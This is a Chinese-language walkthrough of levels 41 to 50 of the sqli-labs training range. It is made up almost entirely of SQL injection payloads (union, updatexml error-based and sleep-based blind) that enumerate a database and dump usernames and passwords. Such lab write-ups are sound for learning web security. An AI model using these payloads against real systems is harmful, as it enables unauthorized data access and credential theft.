sqli-labs-master靶场第四十一关

一，查看数据库

?id=-1 union select 1,2,database()--+

二，查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

三，查看users表中列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

四，查看users表中信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

sqli-labs-master靶场第四十二关

一，登录页面

二，查询数据库

密码框输入：'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

三，查看表名

密码框输入：'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --aaa

四，查看users表中列名

密码框输入：'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

sqli-labs-master靶场第四十三关

一，查询数据库

密码框输入：') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

二，查看表名

密码框输入：') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

三，查看users表中列名

') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

四，查看users表中信息

') union select 1,group_concat(username,password),3 from users -- aaa

sqli-labs-master靶场第四十四关

一，查询数据库

1' union select 1,database(),3 #

二，查看表名

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

三，查看users表中列名

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

四，查看users表中信息

1' union select 1,group_concat(username,password),3 from users #

sqli-labs-master靶场第四十五关

一，查询数据库

1') union select 1,database(),3 #

二，查看表名

1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' # 

三，查看users表中列名

1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

四，查看users表中信息

1') union select 1,group_concat(username,password),3 from users#

sqli-labs-master靶场第四十六关

一，这关的参数是sort，输入?sort=1

二，查询数据库

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

三，查看表名

?sort=1%20and%20updatexml%281,concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=%27security%27%29,0x7e%29,1%29--+

四，查看users表中列名

?sort=1%20and%20updatexml%281,concat%280x7e,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%29,0x7e%29,1%29--+

五，查看users表中信息

?sort=1 and updatexml(1,concat(0x7e,(select substring(group_concat(username,':',password),1,32) from users ),0x7e),1)--+

sqli-labs-master靶场第四十七关

一，这关的参数是sort，输入?sort=1'--+闭合

二，查看数据库

?sort=1' and updatexml(1,concat(1,(select database())),1)--+

三，查看表名

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

sqli-labs-master靶场第四十八关

一，这关的参数是sort，输入?sort=1

二，查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)

数据库第一位字符ascii码为115 's'

以此类推...最终得出数据库名为security

三，查看表名

查security数据库中第一张表的第一位字符

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)

页面延迟

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)

页面正常

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

以此类推...最终得出第一张表的表名为emails

sqli-labs-master靶场第四十九关

一，这关的参数是sort，输入?sort=1'--+闭合

二，查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114 :

?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115

?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

以此类推...最终得出数据库名为security

三，查看表名

查security数据库中第一张表的第一位字符

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

以此类推...最终得出第一张表的表名为emails

sqli-labs-master靶场第五十关

一，尝试输入?sort=1'

我们发现这关可以报错注入

二，爆库名

?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

三，爆表名

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

四，爆users列名

?sort=updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

五，爆users表中信息

?sort=1 and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)